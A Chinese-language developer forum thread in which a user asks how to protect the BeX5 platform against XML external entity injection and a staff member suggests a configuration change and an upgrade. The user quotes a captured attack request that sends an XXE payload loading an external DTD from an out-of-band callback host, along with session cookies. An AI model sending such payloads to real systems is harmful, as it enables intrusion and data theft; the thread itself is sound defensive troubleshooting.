关于XML外部实体注入

ljdkzd · 发表于 2019-8-23 09:21:50

请问BeX5怎么防范XML外部实体注入？

jishuang · 发表于 2019-8-23 11:19:32

平台默认的现在版本的请求都是json格式了

ljdkzd · 发表于 2019-8-23 14:14:42

本帖最后由 ljdkzd 于 2019-8-23 14:48 编辑

POST /x5/UI2/v_20190801v003_nol_zh_CNs_desktopd_pc/system/service/common/bizAction.j?bsessionid=9F4B506EB94F09B21205D832F90663&process=/YiDongKaoQin/kaoQinXiuGaiJiLu/process/kaoqinjilu/kaoqinjiluProcess&activity=mainActivity HTTP/1.1
Host: weixin.jsptpd.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Referer: https://weixin.jspd.com/x5/UI2/v_/portal/pc/index.w?device=pc
Content-Length: 81
Cookie: JSESSIONID=A833184208FA66A4CE942A3D4780DD; request-use-base64=false; bsessionid=9F4B506EB94F09B21205D8DD32F906
Connection: close

<!DOCTYPE a [
<!ENTITY %dtd SYSTEM "http://x2zrbg.ceye.io/xxe.dtd">
%dtd;

这个是相应的报文，请看一下

jishuang · 发表于 2019-8-23 14:57:47

所有的action请求都是xml吗?平台默认的都是json

ljdkzd · 发表于 2019-8-23 16:37:27

jishuang 发表于 2019-8-23 14:57
所有的action请求都是xml吗?平台默认的都是json

平台使用的确实是JSON，但是攻击者用了XML，而且平台也处理了，这也确实是漏洞，这个怎么处理？

jishuang · 发表于 2019-8-23 16:59:26

runtime\UIServer\WEB-INF\justep.xml中的<request-use-base64>false</request-use-base64> 设置为
<request-use-base64>true</request-use-base64> 然后重启tomcat在看看
推荐下载最新的3.8版本测试，3.8在安全方面做了进一步的控制

		自动登录	找回密码
密码			注册

[处理中3] 关于XML外部实体注入